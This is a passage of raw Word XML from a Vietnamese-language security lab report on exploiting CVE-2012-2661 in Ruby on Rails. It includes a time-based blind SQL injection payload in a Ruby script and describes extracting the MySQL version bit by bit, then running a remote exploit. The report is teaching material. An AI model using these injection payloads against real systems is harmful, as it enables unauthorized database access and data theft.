          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cve-2012-2661-local.rb</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F3AB18" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F7AF74" w14:textId="6CB35D23"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6A667B9A">
          <v:shape id="Picture 57" o:spid="_x0000_i1252" type="#_x0000_t75" style="width:6in;height:352.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId250" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E12D904" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sao khi truy cập vào file ta thấy có đã có một tập lênh được tạo ra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641C7386"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def test(sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288CC4C"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begin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451259AC"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t </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=  Time.now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C07020F"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User.where(:id =&gt; {'information_schema where ('+sql+') or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sleep(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1/10)  /*'+Time.now.to_f.to_s+'*/; -- .user' =&gt; {'id' =&gt; '1'}}).all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E6ECD6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D18C375"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rescue </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ActiveRecord::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>StatementInvalid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0F20B1"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return Time.now - t &lt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21660131" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B"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 xml:space="preserve">  end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BB079C" w14:textId="25FA1AA9" w:rsidR="000F3CE5" w:rsidRPr="00E707D0" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291FBF25" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hàm này dung để xủ lý kết quả trả về đúng hay sai một cách tự động và mất thời gian bao lâu một cách tự động hóa mà không cần các bước thủ công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F4AF41" w14:textId="130DA1B4" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="28991028">
          <v:shape id="Picture 58" o:spid="_x0000_i1253" type="#_x0000_t75" style="width:361.5pt;height:232.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId251" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F42F05"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Sao đó ta tiến hành thực thi file này bằng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ruby filename</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và thu được kết quả như hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBCCDEC" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Kết quả ghi ra các version của sql từ thấp đến cao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0234C149" w14:textId="06DD88C2" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Để kiếm tra phiên bản sql hiện tại của hệ thống,</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực thi câu lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>select @@version;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> được kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7CC3C" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2392F4EA" w14:textId="67FE34D6"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7F0E707C">
          <v:shape id="Picture 59" o:spid="_x0000_i1254" type="#_x0000_t75" style="width:148.5pt;height:84pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId252" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA7AB1"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Phiên bản hiện tại đang sử dụng là sql </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1.63-0+squeeze1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD1AF4C"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Tiếp theo ta sử dụng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘5’);</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> lệnh này trả vì ascii của kí tự đầu tiên của số </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403EA5AA" w14:textId="68836576"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5451FDD3">
          <v:shape id="Picture 60" o:spid="_x0000_i1255" type="#_x0000_t75" style="width:132.75pt;height:75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId253" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E66474B" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó ta phân tách số 53 ngày thành mã nhị phân là: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00110101</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thông qua công cụ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kt.gy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9EE98" w14:textId="266CA15A" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đến phần tiếp theo ta phải có kiến thức căn bản về mã nhị phân,</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">về </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>8 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> của một con số trong ascii và cách các bit kết hợp với nhau theo công thức </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0 =0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D34212" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp tục ta sử dụng các đối số tứ 1 đến&lt;53 để tách biệt từng bit thông tin trong con số 53.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A61F7" w14:textId="34F5D681" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Những bit nào đối số với bit </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00110101</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tạo ra kết quả là 0 thì sẽ tạo thành trạng thái false và phản hồi sẽ bị </w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>trễ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ngược lại những bit nào đối số với bit </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00110101</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tạo ra kết quả là 1 thì sẽ tạo thành trạng thái true và phản hồi nhanh chống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD07C3" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo chúng ta bắt đầu vào khai thác lỗi từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520FBC2D" w14:textId="14E7F9E4"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4B4443C0">
          <v:shape id="Picture 61" o:spid="_x0000_i1256" type="#_x0000_t75" style="width:351.75pt;height:281.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId254" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B2D93F" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đây là đoạn script được dung để khai thác lỗi từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284529FE" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Cũng giống như các phương thức trên thay vì khai thác lỗi trực tiếp thì ở đay ta khai thác chúng từ xa thông qua các lỗ hổng nêu trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0068C287" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ruby cve-2012-2661-remote.rb </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339FB238" w14:textId="1C5B42C6" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5683E0FE">
          <v:shape id="Picture 62" o:spid="_x0000_i1257" type="#_x0000_t75" style="width:392.25pt;height:150pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId255" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="236CAC6D" w14:textId="696E5890" w:rsidR="00425DDD" w:rsidRPr="00F12C2B" w:rsidRDefault="00FA2235" w:rsidP="00A8787C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
      <w:r w:rsidR="00001EA3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A8787C" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rack Cookies and Commands injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3940D1D3" w14:textId="6677D39D" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00A8787C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.Giới thiệu:</w:t>
      </w:r>
    </w:p>
